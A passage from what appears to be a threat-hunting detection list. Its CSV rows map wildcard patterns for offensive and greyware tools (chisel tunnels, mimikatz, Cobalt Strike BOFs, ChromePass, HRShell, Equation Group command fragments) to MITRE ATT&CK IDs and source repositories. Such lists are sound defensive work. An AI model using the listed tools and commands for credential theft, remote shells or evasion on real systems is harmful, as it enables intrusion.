-*CheeseRDP.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheeseSQL.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheeseTools.sln*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*CheeseTools-master*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*chenjiandongx/sniffer*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*Chimera-main.zip*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*Chimera-master.zip*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*chioafkonnhbpajpengbalkececleldf*,greyware_tool_keyword,BullVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*chisel -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel client -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel client http*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel server -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel.exe *,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*chisel.exe client*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel.exe server*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel.jpillora.com*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel_1*_darwin_*.gz*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel_1*_linux_*.gz*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel_linux_amd64*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel_windows_amd64.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chisel-master.zip*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*chknull.zip*,offensive_tool_keyword,ChkNull,Checks for Users with No passwords,T1078 - T1201,TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z -*chmod +x dirty*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,0,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*chmod 4777 /tmp/.scsi/dev/bin/gsh*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*chmod 666 /var/run/utmp~*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*chmod 700 lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*chmod 700 nscd crond*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON,1,0,N/A,N/A,1,0,1,2017-11-12T08:13:06Z,2017-11-12T08:10:08Z -*chmod 755 lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*choco install * common.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*chocobo_root.c,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*chocolate.kirbi*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Choosing DLL to hijack.*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*chown root %s chmod 4755 %s %s*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*chown root:root /tmp/.scsi/dev/bin/*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*chrismaddalena/SharpCloud*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*chrispetrou/HRShell*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*chrome* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*chrome_creds.txt*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*chromecertbeggar.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*chromecertbeggar2.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ChromeDump.git*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*chromedump.py*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*ChromeDump-main.zip*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*chromeKey.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*chromeKey.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*chromepass.exe*,offensive_tool_keyword,chromepass,ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/chromepass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*chromepass.zip*,offensive_tool_keyword,chromepass,ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/chromepass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*chromiumkeydump *,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,0,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*chromiumkeydump*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.cna*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.cpp*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.exe*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*Chudry/Xerror*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*chunlie.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*chvancooten/nimbuild*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*chvancooten/NimPlant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*CIMplant.exe *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*CIMplant.sln*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*CIMplant-main*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*cirt-default-usernames.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cirt-fuzzer*,offensive_tool_keyword,cirt-fuzzer,A simple TCP/UDP protocol fuzzer.,T1046 - T1065 - T1190 - T1219 - T1221 - T1497,TA0001 - TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,Sniffing & Spoofing,https://www.ecrimelabs.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cisco2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*cisco-phone-query.sh*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*ckiahbcmlmkpfiijecbpflfahoimklke*,greyware_tool_keyword,Gom VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*clear_cmd,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*clear_command_history.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*ClearEventlog.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation 